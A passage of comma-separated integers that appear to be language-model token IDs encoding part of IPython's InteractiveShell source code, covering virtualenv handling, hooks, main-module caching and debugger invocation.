220, 220, 37227, 13615, 262, 3058, 2491, 6101, 7535, 4554, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 4759, 270, 3421, 32847, 198, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 2488, 672, 2655, 303, 10786, 541, 7535, 62, 15908, 11537, 628, 220, 220, 220, 825, 900, 62, 23736, 521, 298, 7, 944, 11, 8367, 28, 14202, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 7248, 262, 8295, 521, 298, 6056, 13, 628, 220, 220, 220, 220, 220, 220, 220, 1002, 1444, 351, 645, 7159, 11, 340, 6529, 355, 257, 19846, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 611, 1988, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 23736, 521, 298, 796, 407, 2116, 13, 23736, 521, 298, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 23736, 521, 298, 796, 1988, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 2315, 62, 9, 5050, 1444, 416, 11593, 15003, 834, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 2315, 62, 38986, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 7149, 2458, 356, 761, 284, 787, 284, 262, 2836, 338, 2858, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1208, 628, 198, 220, 220, 220, 2488, 672, 2655, 303, 10786, 4033, 669, 11537, 628, 220, 220, 220, 825, 2315, 62, 6404, 9688, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 24243, 1096, 18931, 287, 1339, 340, 373, 9167, 379, 262, 3141, 1627, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 6404, 33295, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 32707, 10786, 6404, 9688, 4064, 82, 24443, 6, 4064, 2116, 13, 6404, 33295, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2116, 13, 6404, 7753, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 32707, 10786, 6404, 9688, 4064, 82, 6, 4064, 2116, 13, 6404, 7753, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2116, 13, 6404, 9688, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 32707, 10786, 6404, 9688, 11537, 628, 220, 220, 220, 825, 2315, 62, 10378, 8344, 341, 62, 40539, 654, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 7881, 4277, 8106, 329, 1207, 8344, 341, 6509, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 481, 1249, 1207, 8344, 341, 6509, 286, 2163, 973, 9427, 2280, 284, 905, 198, 220, 220, 220, 220, 220, 220, 220, 6509, 284, 2985, 11, 290, 991, 7808, 1207, 8344, 341, 6509, 422, 12782, 1330, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 25064, 13, 9641, 62, 10951, 1279, 357, 18, 11, 22, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14601, 13, 24455, 40539, 654, 7203, 12286, 1600, 6536, 28, 12156, 8344, 341, 20361, 11, 8265, 28, 944, 13, 7220, 62, 5907, 13, 1136, 7203, 834, 3672, 834, 48774, 628, 198, 220, 220, 220, 2488, 672, 2655, 303, 10786, 4033, 669, 11537, 628, 220, 220, 220, 825, 2315, 62, 32844, 24330, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 4550, 257, 7166, 24330, 284, 25064, 13, 6978, 523, 262, 2836, 460, 1330, 13103, 422, 340, 13, 198, 220, 220, 220, 220, 220, 220, 220, 770, 2125, 470, 2818, 25, 340, 1595, 470, 779, 262, 11361, 28846, 351, 543, 262, 198, 220, 220, 220, 220, 220, 220, 220, 7166, 24330, 373, 3170, 11, 290, 340, 24245, 262, 1377, 3919, 12, 15654, 12, 43789, 3038, 13, 317, 198, 220, 220, 220, 220, 220, 220, 220, 6509, 481, 1656, 9524, 262, 2836, 42027, 6101, 7535, 287, 262, 198, 220, 220, 220, 220, 220, 220, 220, 7166, 24330, 11, 475, 329, 867, 2663, 11, 340, 2192, 2499, 880, 1576, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 30019, 276, 422, 2438, 45114, 2691, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 2638, 1378, 14036, 13, 3046, 4215, 13, 2398, 14, 10531, 14, 16, 14, 1959, 14, 541, 7535, 12, 392, 12, 32844, 24330, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 705, 53, 48771, 25620, 62, 1677, 53, 6, 407, 287, 28686, 13, 268, 2268, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1892, 287, 257, 7166, 24330, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 279, 796, 28686, 13, 6978, 13, 27237, 7442, 7, 17597, 13, 18558, 18187, 8, 198, 220, 220, 220, 220, 220, 220, 220, 279, 62, 574, 85, 796, 28686, 13, 6978, 13, 27237, 7442, 7, 418, 13, 268, 2268, 17816, 53, 48771, 25620, 62, 1677, 53, 6, 12962, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 28883, 3108, 815, 886, 588, 1220, 8800, 14, 29412, 393, 26867, 46521, 6852, 29412, 13, 13499, 198, 220, 220, 220, 220, 220, 220, 220, 279, 62, 13499, 62, 929, 17, 796, 28686, 13, 6978, 13, 15908, 3672, 7, 418, 13, 6978, 13, 15908, 3672, 7, 79, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 611, 279, 62, 13499, 62, 929, 17, 290, 28686, 13, 6978, 13, 1069, 1023, 7, 79, 62, 574, 85, 8, 290, 28686, 13, 6978, 13, 31642, 7753, 7, 79, 62, 13499, 62, 929, 17, 11, 279, 62, 574, 85, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3954, 409, 68, 318, 2641, 262, 7166, 24330, 11, 836, 470, 761, 284, 466, 1997, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 2121, 1891, 8710, 85, 13326, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 14367, 8019, 8710, 85, 743, 827, 4029, 676, 25064, 13, 18558, 18187, 11, 523, 356, 460, 470, 779, 1103, 6978, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 475, 1854, 460, 827, 4029, 676, 1635, 1462, 9, 262, 8710, 85, 11361, 11, 523, 356, 460, 470, 655, 779, 25064, 13, 18558, 18187, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1406, 356, 655, 2198, 790, 2378, 287, 262, 827, 4029, 676, 5509, 357, 8612, 453, 19841, 513, 8, 198, 220, 220, 220, 220, 220, 220, 220, 13532, 796, 685, 79, 60, 198, 220, 220, 220, 220, 220, 220, 220, 981, 28686, 13, 6978, 13, 3044, 676, 7, 79, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 279, 796, 28686, 13, 6978, 13, 27237, 7442, 7, 418, 13, 6978, 13, 22179, 7, 418, 13, 6978, 13, 15908, 3672, 7, 79, 828, 28686, 13, 961, 8726, 7, 79, 22305, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 13532, 13, 33295, 7, 79, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 554, 5934, 70, 5404, 13532, 588, 366, 66, 7479, 9313, 290, 705, 59, 948, 70, 19472, 59, 66, 59, 986, 6, 389, 1744, 198, 220, 220, 220, 220, 220, 220, 220, 611, 279, 62, 574, 85, 13, 9688, 2032, 342, 10786, 6852, 948, 70, 19472, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 279, 62, 574, 85, 796, 279, 62, 574, 85, 58, 1157, 47715, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 18896, 7, 79, 62, 574, 85, 8, 18189, 362, 290, 279, 62, 574, 85, 58, 16, 60, 6624, 705, 25, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 279, 62, 574, 85, 796, 279, 62, 574, 85, 58, 17, 47715, 628, 220, 220, 220, 220, 220, 220, 220, 611, 597, 7, 79, 62, 574, 85, 287, 279, 329, 279, 287, 13532, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 18162, 6105, 287, 262, 7166, 24330, 11, 836, 470, 761, 284, 466, 1997, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 9828, 7203, 37177, 278, 284, 670, 287, 257, 7166, 24330, 13, 1002, 345, 8791, 2761, 11, 3387, 366, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 17350, 6101, 7535, 2641, 262, 7166, 24330, 19570, 198, 220, 220, 220, 220, 220, 220, 220, 611, 25064, 13, 24254, 6624, 366, 5404, 2624, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7166, 62, 24330, 796, 28686, 13, 6978, 13, 22179, 7, 418, 13, 268, 2268, 17816, 53, 48771, 25620, 62, 1677, 53, 6, 4357, 705, 25835, 3256, 705, 15654, 12, 43789, 11537, 220, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7166, 62, 24330, 796, 28686, 13, 6978, 13, 22179, 7, 418, 13, 268, 2268, 17816, 53, 48771, 25620, 62, 1677, 53, 6, 4357, 705, 8019, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 29412, 4, 67, 13, 4, 67, 6, 4064, 25064, 13, 9641, 62, 10951, 58, 25, 17, 4357, 705, 15654, 12, 43789, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 1330, 2524, 198, 220, 220, 220, 220, 220, 220, 220, 25064, 13, 6978, 13, 28463, 7, 15, 11, 7166, 62, 24330, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2524, 13, 2860, 82, 863, 343, 7, 32844, 62, 24330, 8, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 35849, 656, 262, 25064, 8265, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 3613, 62, 17597, 62, 21412, 62, 5219, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16928, 262, 1181, 286, 26569, 287, 262, 25064, 8265, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 468, 284, 307, 1444, 706, 2116, 13, 7220, 62, 21412, 318, 2727, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13557, 11612, 62, 17597, 62, 21412, 62, 5219, 796, 1391, 6, 19282, 259, 10354, 25064, 13, 19282, 259, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 19282, 448, 10354, 25064, 13, 19282, 448, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 301, 1082, 81, 10354, 25064, 13, 301, 1082, 81, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 1069, 344, 79, 400, 566, 10354, 25064, 13, 1069, 344, 79, 400, 566, 92, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13557, 11612, 62, 17597, 62, 18170, 62, 12417, 62, 3672, 796, 2116, 13, 7220, 62, 21412, 13, 834, 3672, 834, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13557, 11612, 62, 17597, 62, 18170, 62, 12417, 62, 4666, 796, 25064, 13, 18170, 13, 1136, 7, 944, 13, 7220, 62, 21412, 13, 834, 3672, 834, 8, 628, 220, 220, 220, 825, 11169, 62, 17597, 62, 21412, 62, 5219, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 19452, 382, 262, 1181, 286, 262, 25064, 8265, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 479, 11, 410, 287, 2116, 13557, 11612, 62, 17597, 62, 21412, 62, 5219, 13, 23814, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 900, 35226, 7, 17597, 11, 479, 11, 410, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 3460, 4163, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 30027, 644, 644, 1760, 287, 2116, 13, 15003, 62, 17597, 62, 18170, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13557, 11612, 62, 17597, 62, 18170, 62, 12417, 62, 4666, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 25064, 13, 18170, 58, 944, 13557, 11612, 62, 17597, 62, 18170, 62, 12417, 62, 3672, 60, 796, 2116, 13557, 11612, 62, 17597, 62, 18170, 62, 12417, 62, 4666, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 262, 17625, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 2488, 26745, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 26569, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 900, 62, 25480, 7, 944, 11, 3672, 11, 25480, 11, 8475, 28, 1120, 11, 965, 62, 2539, 28, 14202, 11, 302, 62, 2539, 28, 14202, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4808, 40539, 62, 10378, 31023, 28, 17821, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 2617, 62, 25480, 7, 3672, 11, 25480, 8, 4613, 5621, 281, 5387, 6101, 7535, 8011, 13, 628, 220, 220, 220, 220, 220, 220, 220, 6101, 7535, 32142, 617, 286, 663, 5387, 7824, 355, 2836, 12, 4666, 16823, 26569, 13, 220, 2750, 198, 220, 220, 220, 220, 220, 220, 220, 4375, 534, 2163, 284, 530, 286, 777, 26569, 11, 345, 460, 13096, 6101, 7535, 338, 198, 220, 220, 220, 220, 220, 220, 220, 4069, 284, 869, 379, 19124, 534, 898, 31878, 526, 15931, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 1629, 617, 966, 287, 262, 2003, 11, 428, 815, 26571, 262, 8011, 878, 340, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 18178, 340, 13, 220, 18578, 379, 1551, 2198, 326, 262, 8011, 2753, 262, 1271, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 286, 26498, 340, 338, 4385, 284, 13, 628, 220, 220, 220, 220, 220, 220, 220, 277, 796, 3858, 13, 17410, 6030, 7, 25480, 11, 944, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 2198, 611, 262, 8011, 318, 329, 965, 6381, 8071, 2044, 717, 198, 220, 220, 220, 220, 220, 220, 220, 611, 965, 62, 2539, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 264, 26059, 796, 2116, 13, 2536, 6381, 8071, 3533, 13, 1136, 7, 3672, 11, 4285, 49354, 28955, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 264, 26059, 13, 2860, 62, 82, 7, 2536, 62, 2539, 11, 277, 11, 8475, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2536, 6381, 8071, 3533, 58, 3672, 60, 796, 264, 26059, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 198, 220, 220, 220, 220, 220, 220, 220, 611, 302, 62, 2539, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 264, 26059, 796, 2116, 13, 2536, 6381, 8071, 3533, 13, 1136, 7, 3672, 11, 4285, 49354, 28955, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 264, 26059, 13, 2860, 62, 260, 7, 260, 13, 5589, 576, 7, 260, 62, 2539, 828, 277, 11, 8475, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 2536, 6381, 8071, 3533, 58, 3672, 60, 796, 264, 26059, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 628, 220, 220, 220, 220, 220, 220, 220, 288, 79, 796, 651, 35226, 7, 944, 13, 25480, 82, 11, 1438, 11, 6045, 8, 198, 220, 220, 220, 220, 220, 220, 220, 611, 1438, 407, 287, 6101, 7535, 13, 7295, 13, 25480, 82, 13, 834, 439, 834, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7203, 20361, 0, 18531, 705, 4, 82, 6, 318, 407, 530, 286, 4064, 82, 1, 4064, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 3672, 11, 6101, 7535, 13, 7295, 13, 25480, 82, 13, 834, 439, 834, 15306, 628, 220, 220, 220, 220, 220, 220, 220, 611, 4808, 40539, 62, 10378, 31023, 290, 357, 3672, 287, 6101, 7535, 13, 7295, 13, 25480, 82, 13, 10378, 31023, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5559, 796, 6101, 7535, 13, 7295, 13, 25480, 82, 13, 10378, 31023, 58, 3672, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9828, 7203, 39, 566, 23884, 318, 39224, 13, 5765, 23884, 2427, 526, 13, 18982, 7, 3672, 11, 5559, 828, 8931, 5715, 28, 17, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 407, 288, 79, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 288, 79, 796, 6101, 7535, 13, 7295, 13, 25480, 82, 13, 21575, 35491, 7279, 8071, 2044, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 288, 79, 13, 2860, 7, 69, 11, 49336, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 3460, 4163, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 340, 373, 407, 3141, 7983, 11, 8631, 1468, 25439, 532, 6330, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 288, 79, 796, 277, 628, 220, 220, 220, 220, 220, 220, 220, 900, 35226, 7, 944, 13, 25480, 82, 11, 3672, 11, 288, 79, 8, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 2995, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 7881, 62, 7353, 62, 41049, 7, 944, 11, 25439, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 46162, 38827, 11617, 25, 5765, 20966, 13, 31534, 13, 30238, 10786, 7353, 62, 5143, 62, 3846, 3256, 25439, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 17296, 257, 2163, 329, 4585, 706, 2438, 9706, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 9828, 7203, 541, 13, 30238, 62, 7353, 62, 41049, 318, 39224, 11, 779, 366, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 541, 13, 31534, 13, 30238, 10786, 7353, 62, 5143, 62, 3846, 3256, 25439, 8, 2427, 33283, 8931, 5715, 28, 17, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 31534, 13, 30238, 10786, 7353, 62, 5143, 62, 3846, 3256, 25439, 8, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 262, 366, 12417, 1, 8265, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 649, 62, 12417, 62, 4666, 7, 944, 11, 29472, 11, 953, 3672, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 13615, 257, 649, 705, 12417, 6, 8265, 2134, 329, 2836, 2438, 9706, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 7559, 34345, 15506, 815, 307, 262, 3108, 286, 262, 4226, 543, 481, 307, 1057, 287, 262, 198, 220, 220, 220, 220, 220, 220, 220, 8265, 13, 9394, 3558, 351, 262, 976, 29472, 481, 651, 262, 976, 8265, 11, 351, 198, 220, 220, 220, 220, 220, 220, 220, 663, 25745, 12539, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 7559, 4666, 3672, 15506, 815, 307, 262, 8265, 1438, 532, 7685, 2035, 705, 834, 12417, 834, 6, 393, 198, 220, 220, 220, 220, 220, 220, 220, 262, 1615, 12453, 286, 262, 2393, 1231, 262, 7552, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 1649, 14750, 389, 10945, 2884, 4064, 5143, 11, 356, 1276, 1394, 257, 4941, 284, 511, 198, 220, 220, 220, 220, 220, 220, 220, 11593, 12417, 834, 8265, 1088, 523, 326, 11361, 1595, 470, 198, 220, 220, 220, 220, 220, 220, 220, 1598, 340, 11, 14837, 10288, 284, 8265, 15095, 874, 13894, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 2446, 7622, 531, 4941, 287, 257, 2839, 8633, 11, 1994, 276, 416, 262, 198, 220, 220, 220, 220, 220, 220, 220, 4112, 3108, 286, 262, 4226, 13, 770, 835, 11, 329, 3294, 30632, 286, 262, 198, 220, 220, 220, 220, 220, 220, 220, 976, 4226, 356, 691, 1394, 530, 4866, 286, 262, 25745, 357, 1169, 938, 530, 828, 198, 220, 220, 220, 220, 220, 220, 220, 4145, 12174, 4088, 17316, 422, 1468, 10288, 981, 5086, 262, 198, 220, 220, 220, 220, 220, 220, 220, 5563, 422, 262, 938, 9706, 284, 307, 9857, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 29472, 796, 28686, 13, 6978, 13, 397, 2777, 776, 7, 34345, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1388, 62, 4666, 796, 2116, 13557, 12417, 62, 4666, 62, 23870, 58, 34345, 60, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 7383, 12331, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1388, 62, 4666, 796, 2116, 13557, 12417, 62, 4666, 62, 23870, 58, 34345, 60, 796, 3858, 13, 26796, 6030, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 953, 3672, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2205, 2625, 26796, 2727, 329, 4226, 1057, 287, 6101, 7535, 4943, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1388, 62, 4666, 13, 834, 11600, 834, 13, 20063, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1388, 62, 4666, 13, 834, 3672, 834, 796, 953, 3672, 628, 220, 220, 220, 220, 220, 220, 220, 1388, 62, 4666, 13, 834, 7753, 834, 796, 29472, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 632, 2331, 279, 5173, 420, 357, 392, 3737, 1854, 8, 2476, 597, 8265, 4554, 284, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 3494, 257, 11593, 13159, 22570, 834, 2446, 198, 220, 220, 220, 220, 220, 220, 220, 1388, 62, 4666, 13, 834, 13159, 22570, 834, 796, 37456, 1058, 6407, 628, 220, 220, 220, 220, 220, 220, 220, 1441, 1388, 62, 4666, 628, 220, 220, 220, 825, 1598, 62, 12417, 62, 4666, 62, 23870, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 19856, 262, 12940, 286, 1388, 13103, 13, 628, 220, 220, 220, 220, 220, 220, 220, 8774, 306, 329, 779, 416, 20081, 588, 4064, 42503, 13, 628, 220, 220, 220, 220, 220, 220, 220, 21066, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 628, 220, 220, 220, 220, 220, 220, 220, 554, 685, 1314, 5974, 1330, 6101, 7535, 628, 220, 220, 220, 220, 220, 220, 220, 554, 685, 1433, 5974, 285, 796, 4808, 541, 13, 3605, 62, 12417, 62, 4666, 7, 4061, 7535, 13, 834, 7753, 834, 11, 705, 4061, 7535, 11537, 628, 220, 220, 220, 220, 220, 220, 220, 554, 685, 1558, 5974, 18896, 28264, 541, 13557, 12417, 62, 4666, 62, 23870, 8, 1875, 657, 198, 220, 220, 220, 220, 220, 220, 220, 3806, 58, 1558, 5974, 6407, 628, 220, 220, 220, 220, 220, 220, 220, 554, 685, 1507, 5974, 4808, 541, 13, 20063, 62, 12417, 62, 4666, 62, 23870, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 554, 685, 1129, 5974, 18896, 28264, 541, 13557, 12417, 62, 4666, 62, 23870, 8, 6624, 657, 198, 220, 220, 220, 220, 220, 220, 220, 3806, 58, 1129, 5974, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13557, 12417, 62, 4666, 62, 23870, 13, 20063, 3419, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 28769, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 869, 62, 79, 9945, 796, 3119, 28264, 1136, 62, 13345, 62, 79, 9945, 11, 62, 2617, 62, 13345, 62, 79, 9945, 11, 14202, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 15988, 8295, 12, 48545, 286, 279, 9945, 379, 13269, 11537, 628, 220, 220, 220, 825, 49518, 7, 944, 11, 3174, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 14134, 262, 279, 9945, 49518, 13, 628, 220, 220, 220, 220, 220, 220, 220, 7383, 10879, 25, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 532, 2700, 7, 25101, 2599, 416, 4277, 11, 428, 8027, 8794, 262, 4554, 869, 62, 79, 9945, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6056, 290, 857, 407, 1682, 26342, 262, 49518, 611, 262, 6056, 318, 3991, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 705, 3174, 6, 3038, 3386, 262, 49518, 284, 15155, 772, 611, 262, 6056, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 318, 3991, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 628, 220, 220, 220, 220, 220, 220, 220, 611, 407, 357, 3174, 393, 2116, 13, 13345, 62, 79, 9945, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 628, 220, 220, 220, 220, 220, 220, 220, 611, 407, 468, 35226, 7, 17597, 4032, 12957, 62, 40546, 1891, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4049, 10786, 2949, 12854, 1891, 468, 587, 4635, 11, 2147, 284, 14257, 2637, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 628, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 9492, 5275, 22737, 13, 24442, 1362, 7, 3174, 28, 17821, 8, 628, 220, 220, 220, 1303, 10097, 